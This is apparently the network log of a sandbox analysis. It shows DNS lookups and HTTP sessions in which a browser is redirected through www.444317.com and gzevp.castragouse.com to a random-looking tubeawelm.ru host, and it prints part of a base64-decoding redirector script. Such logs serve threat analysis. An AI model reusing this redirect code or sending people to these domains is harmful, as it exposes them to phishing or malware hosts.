                                                                                                                                                            Oct 8, 2024 05:09:27.613948107 CEST192.168.2.51.1.1.10x13b5Standard query (0)staticcdn.duckduckgo.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:27.614177942 CEST192.168.2.51.1.1.10xa20dStandard query (0)staticcdn.duckduckgo.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:41.618947029 CEST192.168.2.51.1.1.10xa936Standard query (0)chrome.google.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:41.619301081 CEST192.168.2.51.1.1.10x83e3Standard query (0)chrome.google.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:42.594602108 CEST192.168.2.51.1.1.10x9b8bStandard query (0)chromewebstore.google.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:42.594731092 CEST192.168.2.51.1.1.10x64c3Standard query (0)chromewebstore.google.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:44.352590084 CEST192.168.2.51.1.1.10x6d8cStandard query (0)lh3.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:44.352735043 CEST192.168.2.51.1.1.10x342aStandard query (0)lh3.googleusercontent.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:47.395962000 CEST192.168.2.51.1.1.10xbd5cStandard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:47.395962000 CEST192.168.2.51.1.1.10x283cStandard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:49.499094009 CEST192.168.2.51.1.1.10xd301Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:49.499334097 CEST192.168.2.51.1.1.10xbddaStandard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:55.806303024 CEST192.168.2.51.1.1.10x8fcdStandard query (0)scone-pa.clients6.google.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:55.806723118 CEST192.168.2.51.1.1.10x72efStandard query (0)scone-pa.clients6.google.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:57.789056063 CEST192.168.2.51.1.1.10xb6c6Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:57.789139032 CEST192.168.2.51.1.1.10x553cStandard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:10:00.237730026 CEST192.168.2.51.1.1.10x5892Standard query (0)scone-pa.clients6.google.comA (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:10:00.238290071 CEST192.168.2.51.1.1.10x9c63Standard query (0)scone-pa.clients6.google.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:10:01.991027117 CEST192.168.2.51.1.1.10xe90Standard query (0)staticcdn.duckduckgo.comA (IP address)IN (0x0001)false
                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Oct 8, 2024 05:08:37.700584888 CEST1.1.1.1192.168.2.50xcc21No error (0)www.444317.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:37.702927113 CEST1.1.1.1192.168.2.50xd3beNo error (0)www.444317.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:37.702927113 CEST1.1.1.1192.168.2.50xd3beNo error (0)www.444317.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:37.717837095 CEST1.1.1.1192.168.2.50xba37No error (0)www.444317.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:37.718708038 CEST1.1.1.1192.168.2.50xbcecNo error (0)www.444317.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:37.718708038 CEST1.1.1.1192.168.2.50xbcecNo error (0)www.444317.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:39.933312893 CEST1.1.1.1192.168.2.50xec5bNo error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:39.933701038 CEST1.1.1.1192.168.2.50x49c6No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:39.936002970 CEST1.1.1.1192.168.2.50xb46No error (0)gzevp.castragouse.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:39.936002970 CEST1.1.1.1192.168.2.50xb46No error (0)gzevp.castragouse.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:39.965135098 CEST1.1.1.1192.168.2.50x3783No error (0)gzevp.castragouse.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.998395920 CEST1.1.1.1192.168.2.50x80a8No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.998395920 CEST1.1.1.1192.168.2.50x80a8No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.998395920 CEST1.1.1.1192.168.2.50x80a8No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.998395920 CEST1.1.1.1192.168.2.50x80a8No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.998924971 CEST1.1.1.1192.168.2.50xfa74No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.999361038 CEST1.1.1.1192.168.2.50xd2b0No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.999361038 CEST1.1.1.1192.168.2.50xd2b0No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.999548912 CEST1.1.1.1192.168.2.50x3dacNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.999548912 CEST1.1.1.1192.168.2.50x3dacNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:41.999752998 CEST1.1.1.1192.168.2.50x1b27No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:42.796080112 CEST1.1.1.1192.168.2.50xc444No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:42.796137094 CEST1.1.1.1192.168.2.50x5b07No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:42.796137094 CEST1.1.1.1192.168.2.50x5b07No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:42.829651117 CEST1.1.1.1192.168.2.50xab37No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:42.829651117 CEST1.1.1.1192.168.2.50xab37No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:42.829651117 CEST1.1.1.1192.168.2.50xab37No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:42.829651117 CEST1.1.1.1192.168.2.50xab37No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:44.016421080 CEST1.1.1.1192.168.2.50xf1d1No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:44.016421080 CEST1.1.1.1192.168.2.50xf1d1No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:44.017003059 CEST1.1.1.1192.168.2.50x63edNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:44.373871088 CEST1.1.1.1192.168.2.50x60f7No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:44.373871088 CEST1.1.1.1192.168.2.50x60f7No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:44.374435902 CEST1.1.1.1192.168.2.50xef70No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:46.347290993 CEST1.1.1.1192.168.2.50x56a1No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:49.850800991 CEST1.1.1.1192.168.2.50x1ecdNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:49.850800991 CEST1.1.1.1192.168.2.50x1ecdNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:49.853636026 CEST1.1.1.1192.168.2.50x8192No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:49.853636026 CEST1.1.1.1192.168.2.50x8192No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:50.476708889 CEST1.1.1.1192.168.2.50x990aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:08:50.476708889 CEST1.1.1.1192.168.2.50x990aNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:04.333911896 CEST1.1.1.1192.168.2.50x9298No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:04.333911896 CEST1.1.1.1192.168.2.50x9298No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:10.596194029 CEST1.1.1.1192.168.2.50x7899No error (0)lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ru172.67.197.235A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:10.596194029 CEST1.1.1.1192.168.2.50x7899No error (0)lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ru104.21.34.46A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:10.684638977 CEST1.1.1.1192.168.2.50x8e7No error (0)lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ru65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:11.839719057 CEST1.1.1.1192.168.2.50xa8acNo error (0)duckduckgo.com40.114.177.156A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:11.896370888 CEST1.1.1.1192.168.2.50xa4fbNo error (0)lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ru172.67.197.235A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:11.896370888 CEST1.1.1.1192.168.2.50xa4fbNo error (0)lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ru104.21.34.46A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:11.898408890 CEST1.1.1.1192.168.2.50xb2f9No error (0)lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ru65IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:16.055354118 CEST1.1.1.1192.168.2.50xc094No error (0)duckduckgo.com40.114.177.156A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:19.156038046 CEST1.1.1.1192.168.2.50x5313No error (0)improving.duckduckgo.comduckduckgo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:19.156038046 CEST1.1.1.1192.168.2.50x5313No error (0)duckduckgo.com40.114.177.156A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:19.156519890 CEST1.1.1.1192.168.2.50xdcbdNo error (0)improving.duckduckgo.comduckduckgo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:27.620872974 CEST1.1.1.1192.168.2.50xa20dNo error (0)staticcdn.duckduckgo.comexternal-content.duckduckgo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:27.621407032 CEST1.1.1.1192.168.2.50x13b5No error (0)staticcdn.duckduckgo.comexternal-content.duckduckgo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:27.621407032 CEST1.1.1.1192.168.2.50x13b5No error (0)external-content.duckduckgo.com40.114.178.124A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:28.266777039 CEST1.1.1.1192.168.2.50x88a5No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:28.266777039 CEST1.1.1.1192.168.2.50x88a5No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:41.626128912 CEST1.1.1.1192.168.2.50xa936No error (0)chrome.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:41.626128912 CEST1.1.1.1192.168.2.50xa936No error (0)www3.l.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:41.628381968 CEST1.1.1.1192.168.2.50x83e3No error (0)chrome.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:42.601432085 CEST1.1.1.1192.168.2.50x9b8bNo error (0)chromewebstore.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:44.359179974 CEST1.1.1.1192.168.2.50x6d8cNo error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:44.359179974 CEST1.1.1.1192.168.2.50x6d8cNo error (0)googlehosted.l.googleusercontent.com142.250.186.65A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:44.360146046 CEST1.1.1.1192.168.2.50x342aNo error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:47.402499914 CEST1.1.1.1192.168.2.50xbd5cNo error (0)play.google.com142.250.74.206A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:49.506062984 CEST1.1.1.1192.168.2.50xd301No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:49.506062984 CEST1.1.1.1192.168.2.50xd301No error (0)plus.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:49.506608009 CEST1.1.1.1192.168.2.50xbddaNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:52.421730042 CEST1.1.1.1192.168.2.50xc2d7No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:52.421730042 CEST1.1.1.1192.168.2.50xc2d7No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:55.813750982 CEST1.1.1.1192.168.2.50x8fcdNo error (0)scone-pa.clients6.google.com142.250.185.74A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:57.797333002 CEST1.1.1.1192.168.2.50x553cNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:57.797358036 CEST1.1.1.1192.168.2.50xb6c6No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:09:57.797358036 CEST1.1.1.1192.168.2.50xb6c6No error (0)plus.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:10:00.246153116 CEST1.1.1.1192.168.2.50x5892No error (0)scone-pa.clients6.google.com142.250.184.234A (IP address)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:10:01.998255014 CEST1.1.1.1192.168.2.50xe90No error (0)staticcdn.duckduckgo.comexternal-content.duckduckgo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Oct 8, 2024 05:10:01.998255014 CEST1.1.1.1192.168.2.50xe90No error (0)external-content.duckduckgo.com40.114.178.124A (IP address)IN (0x0001)false
                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.549714188.114.97.34434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:38 UTC657OUTGET / HTTP/1.1
                                                                                                                                                            Host: www.444317.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:39 UTC597INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:39 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8K4GAZ9%2BOtCsRt748%2Bj%2BeT%2BuIKpimWKqIay52tx5bRIEw2umkjRJiDmAy4jC6Y5qchPyIp37cAHCPNsvTTkA%2FHkH0QIeYX%2BRo2QRCUbbOZFOS95D8V5sw%2BEhDaAKTD1x0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8cf2ed77891cc352-EWR
                                                                                                                                                            2024-10-08 03:08:39 UTC772INData Raw: 34 31 35 0d 0a 3c 73 63 72 69 70 74 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 3e 0a 66 75 6e 63 74 69 6f 6e 20 62 61 73 65 36 34 44 65 63 6f 64 65 55 72 6c 28 73 74 72 29 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 74 6f 62 28 73 74 72 29 2e 73 70 6c 69 74 28 27 27 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 63 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 27 25 27 20 2b 20 28 27 30 30 27 20 2b 20 63 2e 63 68 61 72 43 6f 64 65 41 74
                                                                                                                                                            Data Ascii: 415<scriptlanguage="javascript"><html lang="en"><head><meta charset="UTF-8"><title>Redirect</title><script>function base64DecodeUrl(str){ return decodeURIComponent(atob(str).split('').map(function(c) { return '%' + ('00' + c.charCodeAt
                                                                                                                                                            2024-10-08 03:08:39 UTC280INData Raw: 72 79 20 74 6f 20 62 61 73 65 36 34 20 64 65 63 6f 64 65 20 69 74 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 0a 20 20 20 20 69 66 20 28 75 72 6c 20 26 26 20 2f 5e 28 68 74 74 70 73 3f 3a 5c 2f 5c 2f 29 2f 2e 74 65 73 74 28 75 72 6c 29 29 20 7b 20 2f 2f 20 52 65 67 65 78 20 74 6f 20 63 68 65 63 6b 20 69 66 20 74 68 65 20 75 72 6c 20 73 74 61 72 74 73 20 77 69 74 68 20 27 68 74 74 70 3a 2f 2f 27 20 6f 72 20 27 68 74 74 70 73 3a 2f 2f 27 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 75 72 6c 3b 20 2f 2f 20 49 66 20 69 74 27 73 20 61 20 76 61 6c 69 64 20 55 52 4c 2c 20 72 65 64 69 72 65 63 74 0a 20 20 20 20 7d 0a 7d 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f
                                                                                                                                                            Data Ascii: ry to base64 decode it } } if (url && /^(https?:\/\/)/.test(url)) { // Regex to check if the url starts with 'http://' or 'https://' window.location.href = url; // If it's a valid URL, redirect }};</script></head><body></
                                                                                                                                                            2024-10-08 03:08:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            1192.168.2.549715184.28.90.27443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:40 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                            2024-10-08 03:08:40 UTC467INHTTP/1.1 200 OK
                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                            Server: ECAcc (lpl/EF45)
                                                                                                                                                            X-CID: 11
                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                            X-Ms-Region: prod-weu-z1
                                                                                                                                                            Cache-Control: public, max-age=135422
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:40 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            X-CID: 2


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            2192.168.2.549719188.114.97.34434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:41 UTC689OUTGET /fzFA/ HTTP/1.1
                                                                                                                                                            Host: gzevp.castragouse.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                            Referer: https://www.444317.com/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:41 UTC1020INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:41 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FIFJ45IrO4mInrvqKx%2Fn1Y4zVxQvqhQAst5HTHazx94px0bseciWfDHiW9sGhsu4WWuNjzJo1sei7KkRTn15a9EEUJ4abK%2FBQv%2FaCUW2txRNdfIVQ6BrNyFTxG4S3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6IkI3Q3JrUHM2RlFOYVhTTUtNWDljanc9PSIsInZhbHVlIjoieE80UGRTZVFwSkdCOXlFb3R5Ujdrd2RneVovUlhDT0FFWE9XKytZMlFrNlFJbG5MQ0ZWVjBFOFhEenRkbDFrdEVIbGxKYnNIMkFvZGlFRTBsOUVaR25aNnR3aVg1SG4zQW1tdVJHT0loc2ZWNlZsb3NhZmZVR2RSSEpVdDlDY0ciLCJtYWMiOiI3MmVjYTA2OTEzZDQ4OGVkNDc4NTk5MDIzNGMyZDRmZDNkMTk4N2MzZDlkODdjNGMwYzI2ZWQwNDA2MGE4YTcyIiwidGFnIjoiIn0%3D; expires=Tue, 08-Oct-2024 05:08:41 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                            2024-10-08 03:08:41 UTC541INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 5a 4a 51 6b 45 72 4f 46 64 50 65 58 68 36 55 55 4e 56 4f 47 52 61 64 48 6c 42 63 57 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4c 33 6b 31 61 7a 56 6c 53 45 35 6d 52 7a 64 76 55 48 46 51 4b 33 4a 35 4e 6d 64 47 55 46 4a 76 61 32 78 6f 4d 6e 52 4d 54 6e 70 59 4b 33 5a 76 55 45 74 35 5a 58 6f 34 53 6c 64 77 56 45 56 79 4d 55 4d 77 52 7a 4e 47 5a 6d 30 35 61 6c 41 34 5a 53 74 5a 53 6e 70 74 62 48 5a 7a 62 58 59 77 64 6c 42 45 64 57 74 33 5a 6a 64 56 65 6d 35 69 57 45 78 77 5a 6e 46 74 55 45 67 33 5a 48 4a 59 55 44 6c 6e 57 6d 31 45 4e 69 74 47 63 31 68 58 4f 48 56 79 56 6d 6c 79 55 7a 68 58 65 45 5a 4c 51 58 4a 45 61 6b 4e 45 63 55 30
                                                                                                                                                            Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkZJQkErOFdPeXh6UUNVOGRadHlBcWc9PSIsInZhbHVlIjoiL3k1azVlSE5mRzdvUHFQK3J5NmdGUFJva2xoMnRMTnpYK3ZvUEt5ZXo4SldwVEVyMUMwRzNGZm05alA4ZStZSnptbHZzbXYwdlBEdWt3ZjdVem5iWExwZnFtUEg3ZHJYUDlnWm1ENitGc1hXOHVyVmlyUzhXeEZLQXJEakNEcU0
